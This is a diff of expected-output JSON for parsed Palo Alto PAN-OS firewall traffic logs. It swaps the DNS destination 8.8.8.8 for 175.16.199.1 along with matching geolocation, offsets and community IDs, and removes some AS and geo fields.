+        "event.original": "528 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:32,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:32,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:32,7412,1,46872,53,14789,53,0x400064,udp,allow,234,109,125,2,2020/03/27 09:57:03,0,any,0,2825887,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:03.000+01:00",
         "event.timezone": "+01:00",
@@ -3107,12 +3074,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 14971,
+        "log.offset": 15051,
         "network.application": "dns",
         "network.bytes": 234,
         "network.community_id": [
-            "1:4P50J/H6IWSECotqpob5wRHADD8=",
-            "1:wilpAH8tCL0ic1Q7T+FapvU2oc0="
+            "1:+ON0iUdGzcnAd/FhYZPqU0iKdik=",
+            "1:L2TG4rR8WSLsCfYtff+I41wsn1M="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -3129,12 +3096,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "7412",
-        "panw.panos.network.nat.community_id": "1:wilpAH8tCL0ic1Q7T+FapvU2oc0=",
+        "panw.panos.network.nat.community_id": "1:+ON0iUdGzcnAd/FhYZPqU0iKdik=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825887,
         "panw.panos.source.interface": "ethernet1/3",
@@ -3150,13 +3117,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 125,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -3210,7 +3177,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 15479,
+        "log.offset": 15569,
         "network.application": "ssl",
         "network.bytes": 905,
         "network.community_id": [
@@ -3313,7 +3280,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 15983,
+        "log.offset": 16073,
         "network.application": "google-base",
         "network.bytes": 6398,
         "network.community_id": [
@@ -3386,17 +3353,18 @@
         "client.nat.port": 39786,
         "client.packets": 1,
         "client.port": 51210,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -3410,7 +3378,7 @@
         "event.end": "2020-03-27T09:57:32.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "523 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7460,1,51210,53,39786,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:32,0,any,0,2825882,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "523 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7460,1,51210,53,39786,53,0x400000,udp,allow,108,108,0,1,2020/03/27 09:57:32,0,any,0,2825882,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:32.000+01:00",
         "event.timezone": "+01:00",
@@ -3422,12 +3390,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 16530,
+        "log.offset": 16620,
         "network.application": "dns",
         "network.bytes": 108,
         "network.community_id": [
-            "1:qxDBcqAWxR8SogCdnvdJWTgWms4=",
-            "1:xp7zCX+vHDMEvd7q1q/QqO3ZTRA="
+            "1:gKUp6pqT5tUocgaDs381ZXodOag=",
+            "1:iw2t9VYpS6M+PlAegoX8bTwnweo="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -3444,12 +3412,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "7460",
-        "panw.panos.network.nat.community_id": "1:qxDBcqAWxR8SogCdnvdJWTgWms4=",
+        "panw.panos.network.nat.community_id": "1:gKUp6pqT5tUocgaDs381ZXodOag=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825882,
         "panw.panos.source.interface": "ethernet1/3",
@@ -3465,13 +3433,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -3496,17 +3464,18 @@
         "client.nat.port": 4178,
         "client.packets": 1,
         "client.port": 56105,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -3520,7 +3489,7 @@
         "event.end": "2020-03-27T09:57:32.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "520 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7365,1,56105,53,4178,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:32,0,any,0,2825883,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "520 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7365,1,56105,53,4178,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:32,0,any,0,2825883,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:32.000+01:00",
         "event.timezone": "+01:00",
@@ -3532,12 +3501,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 17033,
+        "log.offset": 17133,
         "network.application": "dns",
         "network.bytes": 97,
         "network.community_id": [
-            "1:7yw1i+xHMyZyx6Z2svN7WU59dYA=",
-            "1:NZYr++3HBWAJIECsCokc4QeNROU="
+            "1:9quKNIQ2DFkPSYoCJwpJRTS55Mc=",
+            "1:g3AJSrbN7D7jhn2LAu2D4tBBdYI="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -3554,12 +3523,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "7365",
-        "panw.panos.network.nat.community_id": "1:NZYr++3HBWAJIECsCokc4QeNROU=",
+        "panw.panos.network.nat.community_id": "1:g3AJSrbN7D7jhn2LAu2D4tBBdYI=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825883,
         "panw.panos.source.interface": "ethernet1/3",
@@ -3575,13 +3544,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -3635,7 +3604,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 17533,
+        "log.offset": 17643,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -3708,17 +3677,18 @@
         "client.nat.port": 26434,
         "client.packets": 1,
         "client.port": 40172,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 0,
         "destination.port": 53,
@@ -3732,7 +3702,7 @@
         "event.end": "2020-03-27T09:57:32.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "521 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7790,1,40172,53,26434,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:32,0,any,0,2825885,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "521 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7790,1,40172,53,26434,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:32,0,any,0,2825885,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:32.000+01:00",
         "event.timezone": "+01:00",
@@ -3744,12 +3714,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 18033,
+        "log.offset": 18143,
         "network.application": "dns",
         "network.bytes": 98,
         "network.community_id": [
-            "1:/Xbja5IEOIk5q43dYJYT0/XSuTI=",
-            "1:kOzD0I5XRtXVwtlBFlzfhN6dr28="
+            "1:7HmvD/OLe083Tynm5UcUyuzDk1w=",
+            "1:TTd1TSJEBk7IlFsYjhJ94nL5+Y8="
         ],
         "network.direction": "unknown",
         "network.packets": 1,
@@ -3766,12 +3736,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "n/a",
         "panw.panos.flow_id": "7790",
-        "panw.panos.network.nat.community_id": "1:kOzD0I5XRtXVwtlBFlzfhN6dr28=",
+        "panw.panos.network.nat.community_id": "1:7HmvD/OLe083Tynm5UcUyuzDk1w=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825885,
         "panw.panos.source.interface": "ethernet1/3",
@@ -3787,13 +3757,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 0,
         "server.port": 53,
@@ -3847,7 +3817,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 18534,
+        "log.offset": 18654,
         "network.application": "ssl",
         "network.bytes": 905,
         "network.community_id": [
@@ -3921,14 +3891,7 @@
         "client.packets": 15,
         "client.port": 59650,
         "destination.address": "172.217.23.174",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 33437,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.23.174",
         "destination.nat.ip": "172.217.23.174",
         "destination.nat.port": 443,
@@ -3957,7 +3920,7 @@
         "input.type": "log",
         "labels.nat_translated": true,
         "labels.ssl_decrypted": true,
-        "log.offset": 19037,
+        "log.offset": 19157,
         "network.application": "google-base",
         "network.bytes": 35266,
         "network.community_id": [
@@ -4032,14 +3995,7 @@
         "client.packets": 1,
         "client.port": 35869,
         "destination.address": "208.67.220.220",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 235,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.220.220",
         "destination.nat.ip": "208.67.220.220",
         "destination.nat.port": 443,
@@ -4067,7 +4023,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 19589,
+        "log.offset": 19709,
         "network.application": "insufficient-data",
         "network.bytes": 333,
         "network.community_id": [
@@ -4141,17 +4097,18 @@
         "client.nat.port": 17695,
         "client.packets": 1,
         "client.port": 35510,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 129,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -4165,7 +4122,7 @@
         "event.end": "2020-03-27T09:57:02.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,6975,1,35510,53,17695,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:02,0,any,0,2825874,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,6975,1,35510,53,17695,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:02,0,any,0,2825874,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:02.000+01:00",
         "event.timezone": "+01:00",
@@ -4177,12 +4134,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 20126,
+        "log.offset": 20246,
         "network.application": "dns",
         "network.bytes": 226,
         "network.community_id": [
-            "1:7NskKvATy4Z2zqSvMm5oTmaU8lE=",
-            "1:mhzPP3Jf6GGCKiSiLRFxS+1O+P8="
+            "1:FBVCqQLFAWHpIHBAg0Vd4AZK17k=",
+            "1:vj2wrlQh2kvEm/IBJH48wMZvt9w="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -4199,12 +4156,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "6975",
-        "panw.panos.network.nat.community_id": "1:7NskKvATy4Z2zqSvMm5oTmaU8lE=",
+        "panw.panos.network.nat.community_id": "1:FBVCqQLFAWHpIHBAg0Vd4AZK17k=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825874,
         "panw.panos.source.interface": "ethernet1/3",
@@ -4220,13 +4177,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 129,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -4251,17 +4208,18 @@
         "client.nat.port": 45148,
         "client.packets": 1,
         "client.port": 40766,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 130,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -4275,7 +4233,7 @@
         "event.end": "2020-03-27T09:57:02.000+01:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7666,1,40766,53,45148,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:02,0,any,0,2825875,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
+        "event.original": "527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7666,1,40766,53,45148,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:02,0,any,0,2825875,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,",
         "event.outcome": "success",
         "event.start": "2020-03-27T09:57:02.000+01:00",
         "event.timezone": "+01:00",
@@ -4287,12 +4245,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 20633,
+        "log.offset": 20763,
         "network.application": "dns",
         "network.bytes": 228,
         "network.community_id": [
-            "1:/DGROGpCvGwdwpEooDiBdsS9YB8=",
-            "1:hGEE8bbZRooRdQ8XY9O8pxn6TDQ="
+            "1:8nqLtOa6TgbO0D6eev2JSx3WR20=",
+            "1:wLkErNt78Sol1InHduV6YDnYwck="
         ],
         "network.direction": "unknown",
         "network.packets": 2,
@@ -4309,12 +4267,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "External",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "7666",
-        "panw.panos.network.nat.community_id": "1:/DGROGpCvGwdwpEooDiBdsS9YB8=",
+        "panw.panos.network.nat.community_id": "1:8nqLtOa6TgbO0D6eev2JSx3WR20=",
         "panw.panos.ruleset": "Internet Access",
         "panw.panos.sequence_number": 2825875,
         "panw.panos.source.interface": "ethernet1/3",
@@ -4330,13 +4288,13 @@
         ],
         "related.ip": [
             "0.0.0.0",
-            "192.168.2.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.2.4"
         ],
         "rule.name": "Internet Access",
         "server.bytes": 130,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -4362,14 +4320,7 @@
         "client.packets": 1,
         "client.port": 54348,
         "destination.address": "208.67.220.220",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 657,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.220.220",
         "destination.nat.ip": "208.67.220.220",
         "destination.nat.port": 443,
@@ -4397,7 +4348,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 21140,
+        "log.offset": 21280,
         "network.application": "dnscrypt",
         "network.bytes": 895,
         "network.community_id": [
@@ -4500,7 +4451,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 21668,
+        "log.offset": 21808,
         "network.application": "ssl",
         "network.bytes": 575,
         "network.community_id": [
@@ -4574,14 +4525,7 @@
         "client.packets": 1,
         "client.port": 46538,
         "destination.address": "208.67.220.220",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 538,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.220.220",
         "destination.nat.ip": "208.67.220.220",
         "destination.nat.port": 443,
@@ -4609,7 +4553,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 22167,
+        "log.offset": 22307,
         "network.application": "dnscrypt",
         "network.bytes": 968,
         "network.community_id": [
@@ -4712,7 +4656,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 22694,
+        "log.offset": 22834,
         "network.application": "ssl",
         "network.bytes": 19301,
         "network.community_id": [
@@ -4786,14 +4730,7 @@
         "client.packets": 1,
         "client.port": 55300,
         "destination.address": "208.67.222.222",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
         "destination.bytes": 218,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "208.67.222.222",
         "destination.nat.ip": "208.67.222.222",
         "destination.nat.port": 443,
@@ -4821,7 +4758,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 23230,
+        "log.offset": 23370,
         "network.application": "dnscrypt",
         "network.bytes": 584,
         "network.community_id": [
@@ -4896,14 +4833,7 @@
         "client.packets": 1,
         "client.port": 55301,
         "destination.address": "208.67.222.222",
-        "destination.as.number": 36692,
-        "destination.as.organization.name": "Cisco OpenDNS, LLC",
